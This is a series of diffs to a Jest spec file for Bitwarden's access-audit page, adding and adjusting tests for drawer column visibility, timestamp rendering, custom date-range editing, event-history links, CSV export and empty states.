+      expect(item.classList).toContain("tw-p-3");
+      expect(item.classList).toContain("tw-min-w-48");
+      expect(item.classList).toContain("tw-max-w-64");
+      expect(bodyRows()[0].querySelectorAll("td")[2].classList).toContain("tw-p-3");
+    });
+
+    // Every way out of a drawer ends in one of these two, and both emit on `closed`. A drawer has no
+    // backdrop of its own to dismiss — it takes a grid column beside the table rather than covering
+    // the page — so there is no third route to miss.
+    it.each([
+      ["the close button", (drawer: FakeDrawer) => drawer.close()],
+      ["Escape", (drawer: FakeDrawer) => drawer.close()],
+      ["a route change", (drawer: FakeDrawer) => drawer.forceClose()],
+    ])("restores all six columns when the drawer closes by %s", async (_route, close) => {
+      await render();
+      await openRow();
+      expect(visibleColumns()).toEqual(WITH_DRAWER);
+
+      close(drawers.at(-1)!);
+      await settle();
+
+      expect(component().detailsOpen()).toBe(false);
+      expect(visibleColumns()).toEqual(ALL_COLUMNS);
+    });
+
+    // Activating a second row replaces the drawer: the outgoing ref closes on the way, and its close
+    // must not be read as "no drawer" over the one that took its place.
+    it("stays at three columns when a different row replaces the open drawer", async () => {
+      await render();
+      await openRow(0);
+      await openRow(1);
+
+      expect(dialogService.openDrawer).toHaveBeenCalledTimes(2);
+      expect(drawers).toHaveLength(2);
+      expect(component().detailsOpen()).toBe(true);
+      expect(visibleColumns()).toEqual(WITH_DRAWER);
+    });
+
+    it("restores all six columns when the replacement drawer is closed", async () => {
+      await render();
+      await openRow(0);
+      await openRow(1);
+
+      drawers.at(-1)!.close();
+      await settle();
+
+      expect(visibleColumns()).toEqual(ALL_COLUMNS);
+    });
+
+    // A ref that closed while a newer one was being opened has nothing left to report.
+    it("ignores a stale ref closing after it was replaced", async () => {
+      await render();
+      await openRow(0);
+      await openRow(1);
+
+      drawers[0].close();
+      await settle();
+
+      expect(component().detailsOpen()).toBe(true);
+      expect(visibleColumns()).toEqual(WITH_DRAWER);
+    });
+
+    // The wrapper is the safety net for widths nothing can be trimmed to fit; it does not go away
+    // just because the ordinary drawer-open case now has nothing to scroll.
+    it("keeps the horizontal scroll container while the drawer is open", async () => {
+      await render();
+      await openRow();
+
+      const table = fixture.nativeElement.querySelector("bit-table");
+      expect(table.parentElement.classList).toContain("tw-overflow-x-auto");
+    });
+
+    // A drawer that never opened — its predecessor's closePredicate refused — leaves the table alone.
+    it("keeps all six columns when the drawer never opened", async () => {
+      await render();
+      dialogService.openDrawer.mockResolvedValue(undefined);
+
+      await openRow();
+
+      expect(component().detailsOpen()).toBe(false);
+      expect(visibleColumns()).toEqual(ALL_COLUMNS);
     });
   });
 });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1,3 +1,4 @@
+import { DatePipe } from "@angular/common";
 import { NO_ERRORS_SCHEMA } from "@angular/core";
 import { ComponentFixture, TestBed } from "@angular/core/testing";
 import { By } from "@angular/platform-browser";
@@ -125,7 +126,7 @@ describe("AccessAuditComponent", () => {
             clearAll: "Clear all",
             pamAuditNoMatchesTitle: "No matching events",
             pamAuditNoMatchesMessage: "No events match the current filters.",
-            pamAuditColumnTime: "Time",
+            timestamp: "Timestamp",
             pamAuditColumnEvent: "Event",
             pamAuditColumnActor: "Actor",
             pamAuditColumnRequester: "Requester",
@@ -1557,6 +1558,47 @@ describe("AccessAuditComponent", () => {
         expect(text(column)).toBe("—");
         expect(cell(column).querySelector(".tw-text-muted")).not.toBeNull();
       }
+    });
+  });
+
+  // The organization event log heads this column "Timestamp" and renders it `medium`; an auditor
+  // reading both surfaces should not have to translate between two renderings of the same instant.
+  describe("timestamp column", () => {
+    const OCCURRED_AT = "2026-08-18T09:00:00.000Z";
+
+    const renderRow = async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([event({ OccurredAt: OCCURRED_AT })]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    const header = (): HTMLElement =>
+      fixture.nativeElement.querySelectorAll("bit-table thead th")[0];
+
+    const cell = (): HTMLElement =>
+      fixture.nativeElement.querySelectorAll("bit-table tbody tr td")[0];
+
+    it("heads the column the way the organization event log heads it", async () => {
+      await renderRow();
+
+      expect(header().textContent!.trim()).toBe("Timestamp");
+    });
+
+    it("renders the whole timestamp rather than an abbreviated one", async () => {
+      await renderRow();
+
+      const medium = new DatePipe("en-US").transform(new Date(OCCURRED_AT), "medium")!;
+      expect(cell().textContent!.trim()).toBe(medium);
+    });
+
+    // The tooltip existed only to recover what `short` left out; a cell that shows the whole
+    // timestamp has nothing left to reveal on hover.
+    it("carries nothing to hover over", async () => {
+      await renderRow();
+
+      expect(cell().querySelector("span")).toBeNull();
     });
   });
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -514,7 +514,7 @@ describe("AccessAuditComponent", () => {
         const noon = new Date(2026, 7, 18, 12, 0);
         const evening = new Date(2026, 7, 18, 18, 0);
         await renderTrail([noon, evening]);
-        closesWith({ from: "2026-08-18T13:00", to: "" });
+        closesWith({ action: "apply", from: "2026-08-18T13:00", to: "" });
 
         await chooseCustom();
 
@@ -525,7 +525,7 @@ describe("AccessAuditComponent", () => {
       // Reopening has to show what the table is filtered to, or the auditor is editing bounds they cannot see.
       it("reopens the dialog on the range in force", async () => {
         await renderTrail([new Date(2026, 7, 18, 12, 0)]);
-        closesWith({ from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+        closesWith({ action: "apply", from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
 
         await chooseCustom();
         selectFilter("timePeriod", null);
@@ -548,6 +548,23 @@ describe("AccessAuditComponent", () => {
 
         expect(component().selectedPeriod()).toBe("past7Days");
         expect(occurredAt()).toEqual([recent.getTime()]);
+      });
+
+      // Clear is the dialog's own way out of a custom range, so the chip goes back to All time with it.
+      it("drops the chip back to All time when the dialog clears the range", async () => {
+        const recent = new Date(now().getTime() - HOUR_MS);
+        const older = new Date(now().getTime() - 40 * DAY_MS);
+        await renderTrail([recent, older]);
+        closesWith({ action: "apply", from: new Date(recent).toISOString().slice(0, 16), to: "" });
+        await chooseCustom();
+        expect(component().selectedPeriod()).toBe("custom");
+
+        closesWith({ action: "clear" });
+        selectFilter("timePeriod", null);
+        await chooseCustom();
+
+        expect(component().selectedPeriod()).toBeNull();
+        expect(component().filteredRows()).toHaveLength(2);
       });
 
       it("leaves the chip unselected when cancelled from no selection at all", async () => {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1,17 +1,27 @@
 import { NO_ERRORS_SCHEMA } from "@angular/core";
 import { ComponentFixture, TestBed } from "@angular/core/testing";
 import { By } from "@angular/platform-browser";
-import { ActivatedRoute } from "@angular/router";
+import { ActivatedRoute, Router, provideRouter } from "@angular/router";
 import { mock, MockProxy } from "jest-mock-extended";
 import * as papa from "papaparse";
 import { of } from "rxjs";
 
+import {
+  OrganizationUserApiService,
+  OrganizationUserUserMiniResponse,
+} from "@bitwarden/admin-console/common";
 import { OrganizationService } from "@bitwarden/common/admin-console/abstractions/organization/organization.service.abstraction";
 import { AccountService } from "@bitwarden/common/auth/abstractions/account.service";
+import { ListResponse } from "@bitwarden/common/models/response/list.response";
 import { FileDownloadService } from "@bitwarden/common/platform/abstractions/file-download/file-download.service";
 import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.service";
 import { LogService } from "@bitwarden/common/platform/abstractions/log.service";
-import { FilterMenuComponent, FilterOptionComponent, I18nMockService } from "@bitwarden/components";
+import {
+  DialogService,
+  FilterMenuComponent,
+  FilterOptionComponent,
+  I18nMockService,
+} from "@bitwarden/components";
 import { HeaderModule } from "@bitwarden/web-vault/app/layouts/header/header.module";
 
 import {
@@ -42,19 +52,36 @@ function event(overrides: Record<string, unknown> = {}): AccessAuditEventRespons
   });
 }
 
+/**
+ * One entry of `getAllMiniUserDetails`, which is what bridges the PLATFORM user id an audit row carries
+ * to the ORGANIZATION USER id the entity-events dialog is keyed on.
+ */
+function member(userId: string, organizationUserId: string, name: string, email: string) {
+  return { userId, id: organizationUserId, name, email };
+}
+
+function miniUserDetails(members: ReturnType<typeof member>[]) {
+  return { data: members } as unknown as ListResponse<OrganizationUserUserMiniResponse>;
+}
+
 describe("AccessAuditComponent", () => {
   let fixture: ComponentFixture<AccessAuditComponent>;
   let auditApiService: MockProxy<AuditApiService>;
   let nameResolver: MockProxy<AccessNameResolverService>;
   let fileDownloadService: MockProxy<FileDownloadService>;
+  let organizationUserApiService: MockProxy<OrganizationUserApiService>;
+  let dialogService: MockProxy<DialogService>;
 
   const configureTestBed = async (canManageAccessRules = true) => {
     await TestBed.configureTestingModule({
       imports: [AccessAuditComponent],
       providers: [
+        provideRouter([]),
         { provide: AuditApiService, useValue: auditApiService },
         { provide: AccessNameResolverService, useValue: nameResolver },
         { provide: FileDownloadService, useValue: fileDownloadService },
+        { provide: OrganizationUserApiService, useValue: organizationUserApiService },
+        { provide: DialogService, useValue: dialogService },
         { provide: LogService, useValue: mock<LogService>() },
         {
           provide: ActivatedRoute,
@@ -133,7 +160,15 @@ describe("AccessAuditComponent", () => {
     auditApiService = mock<AuditApiService>();
     nameResolver = mock<AccessNameResolverService>();
     fileDownloadService = mock<FileDownloadService>();
+    organizationUserApiService = mock<OrganizationUserApiService>();
+    dialogService = mock<DialogService>();
     nameResolver.resolveNames.mockResolvedValue(emptyResolvedNames());
+    organizationUserApiService.getAllMiniUserDetails.mockResolvedValue(
+      miniUserDetails([
+        member("user-1", "org-user-1", "Ada", "ada@example.com"),
+        member("user-2", "org-user-2", "Grace", "grace@example.com"),
+      ]),
+    );
 
     await configureTestBed();
   });
@@ -566,6 +601,190 @@ describe("AccessAuditComponent", () => {
       expect(button.getAttribute("aria-disabled")).toBe("true");
       button.click();
       expect(fileDownloadService.download).not.toHaveBeenCalled();
+    });
+  });
+
+  describe("entity event history links", () => {
+    const render = async (events: AccessAuditEventResponse[]) => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue(events);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    const link = (name: string): HTMLAnchorElement | null =>
+      fixture.nativeElement.querySelector(`#access-audit_link_${name}-0`);
+
+    const cells = (): HTMLElement[] =>
+      Array.from(fixture.nativeElement.querySelectorAll("bit-table tbody tr td"));
+
+    /** The params the one opened dialog was configured with. */
+    const dialogData = () =>
+      (dialogService.open.mock.calls[0][1] as { data: Record<string, unknown> }).data;
+
+    const resolveCipherName = (cipherId: string, name: string) => {
+      nameResolver.resolveNames.mockResolvedValue({
+        ...emptyResolvedNames(),
+        cipherNameById: new Map([[cipherId, name]]),
+      });
+    };
+
+    it("opens an actor's event history from their name", async () => {
+      await render([event({ ActorId: "user-1", ActorName: "Ada" })]);
+
+      const anchor = link("actor")!;
+      expect(anchor).not.toBeNull();
+      expect(anchor.textContent!.trim()).toBe("Ada");
+      expect(anchor.getAttribute("title")).toBe("ada@example.com");
+      // Focusable and Enter-activatable as a native anchor, rather than a click-only span.
+      expect(anchor.getAttribute("href")).toBe("#");
+
+      anchor.click();
+
+      expect(dialogService.open).toHaveBeenCalledTimes(1);
+      // The dialog is keyed on the ORGANIZATION USER id, not the platform user id the row carries.
+      expect(dialogData()).toEqual({
+        entity: "user",
+        entityId: "org-user-1",
+        organizationId: ORGANIZATION_ID,
+        name: "Ada",
+        showUser: true,
+      });
+    });
+
+    it("opens a requester's event history from their name", async () => {
+      await render([event({ RequesterId: "user-2", RequesterName: "Grace" })]);
+
+      const anchor = link("requester")!;
+      expect(anchor).not.toBeNull();
+      expect(anchor.getAttribute("title")).toBe("grace@example.com");
+
+      anchor.click();
+
+      expect(dialogData()).toEqual({
+        entity: "user",
+        entityId: "org-user-2",
+        organizationId: ORGANIZATION_ID,
+        name: "Grace",
+        showUser: true,
+      });
+    });
+
+    it("opens the item's event history from a cipher row", async () => {
+      resolveCipherName("cipher-1", "Prod database");
+      await render([event({ CipherId: "cipher-1", CollectionId: "col-1" })]);
+
+      const anchor = link("item")!;
+      expect(anchor).not.toBeNull();
+      expect(anchor.textContent!.trim()).toBe("Prod database");
+
+      anchor.click();
+
+      expect(dialogData()).toEqual({
+        entity: "cipher",
+        entityId: "cipher-1",
+        organizationId: ORGANIZATION_ID,
+        name: "Prod database",
+        showUser: true,
+      });
+    });
+
+    // The automated bucket is not a member, so there is no event history behind it.
+    it("leaves the System actor as plain text", async () => {
+      await render([event({ ActorId: "user-1", ActorName: "Ada", Automated: true })]);
+
+      expect(link("actor")).toBeNull();
+      expect(cells()[2].textContent).toContain("System");
+    });
+
+    it("leaves an identity the member lookup did not resolve as plain text", async () => {
+      await render([
+        event({
+          ActorId: "user-9",
+          ActorName: "Linus",
+          RequesterId: "user-9",
+          RequesterName: "Linus",
+        }),
+      ]);
+
+      expect(link("actor")).toBeNull();
+      expect(link("requester")).toBeNull();
+      expect(cells()[2].textContent).toContain("Linus");
+      expect(cells()[3].textContent).toContain("Linus");
+    });
+
+    // There is no entity-events dialog for an access rule, and the rule editor is behind
+    // canManageAccessRules, which this page's guard does not imply.
+    it("leaves a rule name as plain text", async () => {
+      await render([event({ Kind: "ruleCreated", RuleName: "Production access" })]);
+
+      expect(link("item")).toBeNull();
+      expect(cells()[4].textContent).toContain("Production access");
+    });
+
+    // An item outside the viewer's own vault has no decrypted name to render as link text.
+    it("leaves an item that did not decrypt unlinked", async () => {
+      await render([event({ CipherId: "cipher-1", CollectionId: "col-1" })]);
+
+      expect(link("item")).toBeNull();
+      expect(cells()[4].textContent).toContain("—");
+    });
+
+    // An auditor mid-table expects to keep their place; the organization event log's own member link
+    // routes on to the members page, which sits behind a permission this page's viewer need not hold.
+    it("does not navigate away when a dialog is opened", async () => {
+      const router = TestBed.inject(Router);
+      const navigate = jest.spyOn(router, "navigate").mockResolvedValue(true);
+      const navigateByUrl = jest.spyOn(router, "navigateByUrl").mockResolvedValue(true);
+
+      await render([event({ ActorId: "user-1", ActorName: "Ada" })]);
+      link("actor")!.click();
+      link("requester")!.click();
+
+      expect(dialogService.open).toHaveBeenCalledTimes(2);
+      expect(navigate).not.toHaveBeenCalled();
+      expect(navigateByUrl).not.toHaveBeenCalled();
+    });
+
+    // AccessEventLogs authorizes this trail but does not imply permission to enumerate members, so a
+    // refused lookup is an ordinary outcome for a legitimate viewer — not a reason to fail the page.
+    it("renders the whole trail with nothing linked when the member lookup fails", async () => {
+      organizationUserApiService.getAllMiniUserDetails.mockRejectedValue(new Error("forbidden"));
+      resolveCipherName("cipher-1", "Prod database");
+
+      await expect(
+        render([
+          event({ ActorId: "user-1", ActorName: "Ada" }),
+          event({ CipherId: "cipher-1", CollectionId: "col-1" }),
+        ]),
+      ).resolves.not.toThrow();
+
+      expect(component().status()).toBe("ready");
+      expect(component().rows()).toHaveLength(2);
+      expect(link("actor")).toBeNull();
+      expect(link("requester")).toBeNull();
+      expect(cells()[2].textContent).toContain("Ada");
+      expect(TestBed.inject(LogService).error).toHaveBeenCalled();
+    });
+
+    // The cipher link is resolved from local vault state, not from the member lookup, so it survives.
+    it("still links the item when only the member lookup failed", async () => {
+      organizationUserApiService.getAllMiniUserDetails.mockRejectedValue(new Error("forbidden"));
+      resolveCipherName("cipher-1", "Prod database");
+
+      await render([event({ CipherId: "cipher-1", CollectionId: "col-1" })]);
+
+      expect(link("item")).not.toBeNull();
+    });
+
+    it("reads the member lookup once per load, not once per row", async () => {
+      await render([event(), event(), event()]);
+
+      expect(organizationUserApiService.getAllMiniUserDetails).toHaveBeenCalledTimes(1);
+      expect(organizationUserApiService.getAllMiniUserDetails).toHaveBeenCalledWith(
+        ORGANIZATION_ID,
+      );
     });
   });
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -3,10 +3,12 @@ import { ComponentFixture, TestBed } from "@angular/core/testing";
 import { By } from "@angular/platform-browser";
 import { ActivatedRoute } from "@angular/router";
 import { mock, MockProxy } from "jest-mock-extended";
+import * as papa from "papaparse";
 import { of } from "rxjs";
 
 import { OrganizationService } from "@bitwarden/common/admin-console/abstractions/organization/organization.service.abstraction";
 import { AccountService } from "@bitwarden/common/auth/abstractions/account.service";
+import { FileDownloadService } from "@bitwarden/common/platform/abstractions/file-download/file-download.service";
 import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.service";
 import { LogService } from "@bitwarden/common/platform/abstractions/log.service";
 import { FilterMenuComponent, FilterOptionComponent, I18nMockService } from "@bitwarden/components";
@@ -44,6 +46,7 @@ describe("AccessAuditComponent", () => {
   let fixture: ComponentFixture<AccessAuditComponent>;
   let auditApiService: MockProxy<AuditApiService>;
   let nameResolver: MockProxy<AccessNameResolverService>;
+  let fileDownloadService: MockProxy<FileDownloadService>;
 
   const configureTestBed = async (canManageAccessRules = true) => {
     await TestBed.configureTestingModule({
@@ -51,6 +54,7 @@ describe("AccessAuditComponent", () => {
       providers: [
         { provide: AuditApiService, useValue: auditApiService },
         { provide: AccessNameResolverService, useValue: nameResolver },
+        { provide: FileDownloadService, useValue: fileDownloadService },
         { provide: LogService, useValue: mock<LogService>() },
         {
           provide: ActivatedRoute,
@@ -109,6 +113,8 @@ describe("AccessAuditComponent", () => {
             removeItem: (name?: string) => `Remove ${name}`,
             search: "Search",
             resetSearch: "Reset search",
+            exportVerb: "Export",
+            close: "Close",
           }),
         },
       ],
@@ -128,6 +134,7 @@ describe("AccessAuditComponent", () => {
   beforeEach(async () => {
     auditApiService = mock<AuditApiService>();
     nameResolver = mock<AccessNameResolverService>();
+    fileDownloadService = mock<FileDownloadService>();
     nameResolver.resolveNames.mockResolvedValue(emptyResolvedNames());
 
     await configureTestBed();
@@ -493,5 +500,88 @@ describe("AccessAuditComponent", () => {
     await fixture.whenStable();
 
     expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(1);
+  });
+
+  describe("export", () => {
+    const clickExport = () => {
+      fixture.nativeElement.querySelector("#access-audit_button_export").click();
+    };
+
+    const exportedRows = () => {
+      const request = fileDownloadService.download.mock.calls[0][0];
+      return papa.parse<Record<string, string>>(request.blobData as string, { header: true }).data;
+    };
+
+    // The file has to hold what the auditor narrowed the table down to: exporting the whole fetched
+    // window would hand them back the rows they deliberately filtered out.
+    it("exports the rows the filters left on screen, not the whole trail", async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([
+        event({ ActorId: "user-1", ActorName: "Ada" }),
+        event({ ActorId: "user-3", ActorName: "Linus" }),
+        event({ ActorId: "user-3", ActorName: "Linus" }),
+      ]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      component().actorControl.setValue("user-3");
+      fixture.detectChanges();
+      clickExport();
+
+      expect(component().rows()).toHaveLength(3);
+      expect(exportedRows()).toHaveLength(2);
+      expect(exportedRows().map((row) => row.actorName)).toEqual(["Linus", "Linus"]);
+    });
+
+    it("hands the download service one csv blob", async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      clickExport();
+
+      expect(fileDownloadService.download).toHaveBeenCalledTimes(1);
+      const request = fileDownloadService.download.mock.calls[0][0];
+      expect(request.fileName).toMatch(/\.csv$/);
+      expect(request.blobOptions).toEqual({ type: "text/csv" });
+      expect(request.blobData).toContain("Request approved");
+    });
+
+    // Everything the file needs is already in the browser, and the endpoint takes no parameters, so an
+    // export that re-read the trail would be a bug rather than a refresh.
+    it("does not re-read the trail to export", async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      clickExport();
+
+      expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(1);
+    });
+
+    it("disables Export while no row matches the filters", async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([event({ ActorName: "Ada" })]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      const button = fixture.nativeElement.querySelector("#access-audit_button_export");
+      expect(button.getAttribute("aria-disabled")).toBeNull();
+
+      component().searchControl.setValue("nothing matches this");
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      expect(button.getAttribute("aria-disabled")).toBe("true");
+      button.click();
+      expect(fileDownloadService.download).not.toHaveBeenCalled();
+    });
   });
 });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -121,6 +121,7 @@ describe("AccessAuditComponent", () => {
             recentlyActivePast7Days: "Past 7 days",
             recentlyActivePast30Days: "Past 30 days",
             custom: "Custom",
+            edit: "Edit",
             clearAll: "Clear all",
             pamAuditNoMatchesTitle: "No matching events",
             pamAuditNoMatchesMessage: "No events match the current filters.",
@@ -653,6 +654,48 @@ describe("AccessAuditComponent", () => {
         expect(dialogService.open).toHaveBeenLastCalledWith(expect.anything(), {
           data: { from: "2026-08-18T09:00", to: "2026-08-18T17:00" },
         });
+      });
+
+      // Re-selecting "Custom" writes the value the chip already holds, so its selection signal never
+      // notifies and the dialog cannot be reopened from the menu. Editing the bounds in force would
+      // otherwise mean dropping them first.
+      it("reopens the dialog from Edit without dropping the range in force", async () => {
+        await renderTrail([new Date(2026, 7, 18, 12, 0)]);
+        closesWith({ action: "apply", from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+        await chooseCustom();
+
+        const edit = fixture.nativeElement.querySelector("#access-audit_button_edit-range");
+        expect(edit).not.toBeNull();
+
+        closesWith({ action: "apply", from: "2026-08-18T10:00", to: "2026-08-18T16:00" });
+        edit.click();
+        await fixture.whenStable();
+        fixture.detectChanges();
+
+        expect(dialogService.open).toHaveBeenLastCalledWith(expect.anything(), {
+          data: { from: "2026-08-18T09:00", to: "2026-08-18T17:00" },
+        });
+        expect(component().selectedPeriod()).toBe("custom");
+        expect(component().range()).toEqual({
+          from: new Date("2026-08-18T10:00"),
+          to: new Date("2026-08-18T16:00:59.999"),
+        });
+      });
+
+      // Nothing to edit until a range is in force, and nothing to edit once one of the presets is.
+      it("offers Edit only while a custom range is the period in force", async () => {
+        await renderTrail([new Date(2026, 7, 18, 12, 0)]);
+        expect(fixture.nativeElement.querySelector("#access-audit_button_edit-range")).toBeNull();
+
+        selectFilter("timePeriod", "past7Days");
+        expect(fixture.nativeElement.querySelector("#access-audit_button_edit-range")).toBeNull();
+
+        closesWith({ action: "apply", from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+        await chooseCustom();
+
+        expect(
+          fixture.nativeElement.querySelector("#access-audit_button_edit-range"),
+        ).not.toBeNull();
       });
 
       // A cancelled dialog that left "Custom" showing would claim a range the table is not filtered to.

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1398,6 +1398,84 @@ describe("AccessAuditComponent", () => {
     });
   });
 
+  describe("no matches", () => {
+    const emptyStateClearAll = (): HTMLButtonElement | null =>
+      fixture.nativeElement.querySelector("#access-audit_button_no-matches-clear-all");
+
+    const renderReady = async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([
+        event({ ActorId: "user-1", ActorName: "Ada" }),
+        event({ ActorId: "user-3", ActorName: "Linus" }),
+      ]);
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    /** Narrows to a kind the trail does not carry, which leaves the filtered table empty. */
+    const overFilter = () => selectFilter("kind", ["pamAuditKindRuleCreated"]);
+
+    // Filtering something out is an ordinary outcome, not the unexpected condition a callout announces.
+    it("renders the standard empty state rather than a callout", async () => {
+      await renderReady();
+      overFilter();
+
+      expect(component().filteredRows()).toHaveLength(0);
+      expect(fixture.nativeElement.querySelector("bit-no-items")).not.toBeNull();
+      expect(fixture.nativeElement.querySelector("bit-callout")).toBeNull();
+      expect(fixture.nativeElement.querySelector("bit-table")).toBeNull();
+    });
+
+    it("carries the no-matches title and message into the empty state", async () => {
+      await renderReady();
+      overFilter();
+
+      const noItems = fixture.nativeElement.querySelector("bit-no-items") as HTMLElement;
+      expect(noItems.querySelector("[slot=title]")!.textContent!.trim()).toBe("No matching events");
+      expect(noItems.querySelector("[slot=description]")!.textContent!.trim()).toBe(
+        "No events match the current filters.",
+      );
+    });
+
+    // The trail-with-no-events state is a different empty state, with its own copy and its own action.
+    it("leaves the trail's own empty state alone", async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      expect(component().status()).toBe("empty");
+      const noItems = fixture.nativeElement.querySelector("bit-no-items") as HTMLElement;
+      expect(noItems.querySelector("[slot=title]")!.textContent!.trim()).toBe("No audit activity");
+      expect(fixture.nativeElement.querySelector("#access-audit_link_access-rules")).not.toBeNull();
+      expect(emptyStateClearAll()).toBeNull();
+    });
+
+    // The way out of an over-filtered table has to be where the auditor is looking, not only in the
+    // chip row above it.
+    it("resets every chip from the empty state's Clear all", async () => {
+      await renderReady();
+      selectFilter("actor", ["user-1"]);
+      selectFilter("timePeriod", "today");
+      overFilter();
+      expect(emptyStateClearAll()).not.toBeNull();
+
+      emptyStateClearAll()!.click();
+      fixture.detectChanges();
+
+      expect(
+        component()
+          .chips()
+          .some((chip: any) => chip.active()),
+      ).toBe(false);
+      expect(component().selectedPeriod()).toBeNull();
+      expect(component().filteredRows()).toHaveLength(2);
+      expect(fixture.nativeElement.querySelector("bit-table")).not.toBeNull();
+      expect(emptyStateClearAll()).toBeNull();
+    });
+  });
+
   describe("empty cells", () => {
     const ACTOR = 2;
     const REQUESTER = 3;

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -2090,8 +2090,7 @@ describe("AccessAuditComponent", () => {
       expect(visibleColumns()).toEqual(WITH_DRAWER);
     });
 
-    // The wrapper is the safety net for widths nothing can be trimmed to fit; it does not go away
-    // just because the ordinary drawer-open case now has nothing to scroll.
+    // The wrapper is the safety net for widths nothing can be trimmed to fit.
     it("keeps the horizontal scroll container while the drawer is open", async () => {
       await render();
       await openRow();

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -255,7 +255,6 @@ describe("AccessAuditComponent", () => {
     await fixture.whenStable();
     fixture.detectChanges();
 
-    // Labelled and sorted alphabetically, one entry per distinct kind label key.
     expect(kindMenuOptions()).toEqual([
       { label: "Lease activated", value: "pamAuditKindLeaseActivated" },
       { label: "Request approved", value: "pamAuditKindRequestApproved" },

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -30,8 +30,10 @@ function event(overrides: Record<string, unknown> = {}): AccessAuditEventRespons
     OrganizationId: ORGANIZATION_ID,
     ActorId: "user-1",
     ActorName: "Ada",
+    ActorEmail: "ada@example.com",
     RequesterId: "user-2",
     RequesterName: "Grace",
+    RequesterEmail: "grace@example.com",
     Automated: false,
     Incomplete: false,
     ...overrides,
@@ -360,16 +362,27 @@ describe("AccessAuditComponent", () => {
     expect(component().actorOptions()).toEqual([]);
   });
 
-  it("separates two requesters who share a display name", async () => {
+  it("tells apart two requesters who share a display name", async () => {
     auditApiService.listAccessAuditTrail.mockResolvedValue([
-      event({ RequesterId: "user-2", RequesterName: "J. Smith" }),
-      event({ RequesterId: "user-4", RequesterName: "J. Smith" }),
+      event({
+        RequesterId: "user-2",
+        RequesterName: "J. Smith",
+        RequesterEmail: "smith-a@example.com",
+      }),
+      event({
+        RequesterId: "user-4",
+        RequesterName: "J. Smith",
+        RequesterEmail: "smith-b@example.com",
+      }),
     ]);
 
     fixture.detectChanges();
     await fixture.whenStable();
 
-    expect(component().requesterOptions()).toHaveLength(2);
+    expect(component().requesterOptions()).toEqual([
+      { label: "J. Smith (smith-a@example.com)", value: "user-2" },
+      { label: "J. Smith (smith-b@example.com)", value: "user-4" },
+    ]);
 
     component().requesterControl.setValue("user-4");
 
@@ -415,11 +428,12 @@ describe("AccessAuditComponent", () => {
     expect(component().filteredRows()[0].occurredAt).toEqual(noon);
   });
 
-  it("leaves the table alone and reports an inverted range rather than emptying it", async () => {
+  it("leaves the table alone and reports an inverted range on the To field rather than emptying it", async () => {
     auditApiService.listAccessAuditTrail.mockResolvedValue([event(), event()]);
 
     fixture.detectChanges();
     await fixture.whenStable();
+    fixture.detectChanges();
 
     component().fromControl.setValue("2026-08-18T18:00");
     component().toControl.setValue("2026-08-18T09:00");
@@ -427,9 +441,34 @@ describe("AccessAuditComponent", () => {
 
     expect(component().invertedRange()).toBe(true);
     expect(component().filteredRows()).toHaveLength(2);
-    expect(fixture.nativeElement.querySelector("bit-error").textContent).toContain(
+
+    const toInput = fixture.nativeElement.querySelector("#access-audit_input_to");
+    const fromInput = fixture.nativeElement.querySelector("#access-audit_input_from");
+    expect(toInput.closest("bit-form-field").querySelector("bit-error").textContent).toContain(
       "Invalid date range.",
     );
+    expect(toInput.getAttribute("aria-invalid")).toBe("true");
+    expect(fromInput.getAttribute("aria-invalid")).not.toBe("true");
+  });
